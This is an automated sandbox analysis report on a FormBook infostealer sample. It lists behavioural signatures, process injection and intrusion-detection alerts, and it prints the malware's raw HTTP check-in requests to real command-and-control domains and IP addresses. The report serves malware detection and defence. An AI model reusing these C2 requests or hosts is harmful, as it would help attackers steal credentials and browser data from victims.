
Windows Analysis Report
SpCuEoekPa.exe

Overview

General Information

Sample name: SpCuEoekPa.exe (renamed because original name is a hash value)
Original sample name: e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21.exe
Analysis ID: 1588628
MD5: 9a01cd212369451960342e9ccf98c51d
SHA1: 4ef0a6f2fe5a55bffa839ede7a2e8093fe741533
SHA256: e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21
Tags: exe, user-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SpCuEoekPa.exe (PID: 7884 cmdline: "C:\Users\user\Desktop\SpCuEoekPa.exe" MD5: 9A01CD212369451960342E9CCF98C51D)
    • svchost.exe (PID: 8016 cmdline: "C:\Users\user\Desktop\SpCuEoekPa.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OGbZSCDMTTWQqW.exe (PID: 6832 cmdline: "C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 6096 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • OGbZSCDMTTWQqW.exe (PID: 6352 cmdline: "C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further entries not shown)

Source | Rule | Description | Author | Strings
3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ParentImage: C:\Users\user\Desktop\SpCuEoekPa.exe, ParentProcessId: 7884, ParentProcessName: SpCuEoekPa.exe, ProcessCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ProcessId: 8016, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ParentImage: C:\Users\user\Desktop\SpCuEoekPa.exe, ParentProcessId: 7884, ParentProcessName: SpCuEoekPa.exe, ProcessCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ProcessId: 8016, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:32:05.335065+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49974 | 38.47.233.21 | 80 | TCP
2025-01-11T03:32:29.533346+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49979 | 172.67.137.47 | 80 | TCP
2025-01-11T03:33:04.000410+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49983 | 206.238.89.119 | 80 | TCP
2025-01-11T03:33:17.274674+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49987 | 66.29.149.46 | 80 | TCP
2025-01-11T03:33:30.621345+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49991 | 217.70.184.50 | 80 | TCP
2025-01-11T03:33:44.702276+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49995 | 13.228.81.39 | 80 | TCP
2025-01-11T03:34:00.885211+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-11T03:34:15.255213+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 50003 | 104.21.64.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:32:05.335065+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49974 | 38.47.233.21 | 80 | TCP
2025-01-11T03:32:29.533346+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49979 | 172.67.137.47 | 80 | TCP
2025-01-11T03:33:04.000410+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49983 | 206.238.89.119 | 80 | TCP
2025-01-11T03:33:17.274674+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49987 | 66.29.149.46 | 80 | TCP
2025-01-11T03:33:30.621345+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49991 | 217.70.184.50 | 80 | TCP
2025-01-11T03:33:44.702276+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49995 | 13.228.81.39 | 80 | TCP
2025-01-11T03:34:00.885211+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-11T03:34:15.255213+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 50003 | 104.21.64.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:32:21.843289+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49975 | 172.67.137.47 | 80 | TCP
2025-01-11T03:32:24.372116+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49976 | 172.67.137.47 | 80 | TCP
2025-01-11T03:32:26.972005+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49977 | 172.67.137.47 | 80 | TCP
2025-01-11T03:32:36.425140+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49980 | 206.238.89.119 | 80 | TCP
2025-01-11T03:32:38.971900+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49981 | 206.238.89.119 | 80 | TCP
2025-01-11T03:32:41.534350+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49982 | 206.238.89.119 | 80 | TCP
2025-01-11T03:33:10.550115+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49984 | 66.29.149.46 | 80 | TCP
2025-01-11T03:33:12.188505+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49985 | 66.29.149.46 | 80 | TCP
2025-01-11T03:33:14.741830+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49986 | 66.29.149.46 | 80 | TCP
2025-01-11T03:33:22.966175+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49988 | 217.70.184.50 | 80 | TCP
2025-01-11T03:33:25.551422+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49989 | 217.70.184.50 | 80 | TCP
2025-01-11T03:33:28.071583+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49990 | 217.70.184.50 | 80 | TCP
2025-01-11T03:33:37.057594+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49992 | 13.228.81.39 | 80 | TCP
2025-01-11T03:33:39.608449+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49993 | 13.228.81.39 | 80 | TCP
2025-01-11T03:33:42.183675+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49994 | 13.228.81.39 | 80 | TCP
2025-01-11T03:33:50.196022+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49996 | 13.248.169.48 | 80 | TCP
2025-01-11T03:33:52.749759+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49997 | 13.248.169.48 | 80 | TCP
2025-01-11T03:33:55.293008+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49998 | 13.248.169.48 | 80 | TCP
2025-01-11T03:34:07.456560+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50000 | 104.21.64.1 | 80 | TCP
2025-01-11T03:34:10.004418+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50001 | 104.21.64.1 | 80 | TCP
2025-01-11T03:34:12.550350+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 50002 | 104.21.64.1 | 80 | TCP


                AV Detection

Source: http://www.sunnyz.store/ead0/, Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL, Avira URL Cloud: Label: malware
Source: http://www.gk88top.top/vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL, Avira URL Cloud: Label: malware
Source: http://www.gk88top.top/vjnn/, Avira URL Cloud: Label: malware
Source: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB, Avira URL Cloud: Label: malware
Source: http://www.sunnyz.store/ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL, Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/dc08/, Avira URL Cloud: Label: malware
Source: SpCuEoekPa.exe, Virustotal: Detection: 52%
Source: SpCuEoekPa.exe, ReversingLabs: Detection: 71%
Source: Yara match, File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: SpCuEoekPa.exe, Joe Sandbox ML: detected
Source: SpCuEoekPa.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: comp.pdb; source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602038469.000000000077E000.00000002.00000001.01000000.00000006.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757528049.000000000077E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: comp.pdbGCTL; source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\comp.exe, Code function: 7_2_0068C420 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then xor eax, eax (7_2_00679F20)
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then pop edi (7_2_0067E0FB)
Source: C:\Windows\SysWOW64\comp.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_02CF0528)

                Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49999 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49999 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49991 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49974 -> 38.47.233.21:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49974 -> 38.47.233.21:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49991 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49975 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 172.67.137.47:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49983 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49983 -> 206.238.89.119:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49995 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49995 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49987 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49987 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50003 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 217.70.184.50:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50003 -> 104.21.64.1:80
Source: Joe Sandbox View, IP Address: 38.47.233.21
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\SpCuEoekPa.exe, Code function: 0_2_003D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic, HTTP traffic detected:
    GET /t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.qqa79.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
    GET /vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Host: www.gk88top.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Source: global traffic, HTTP traffic detected:
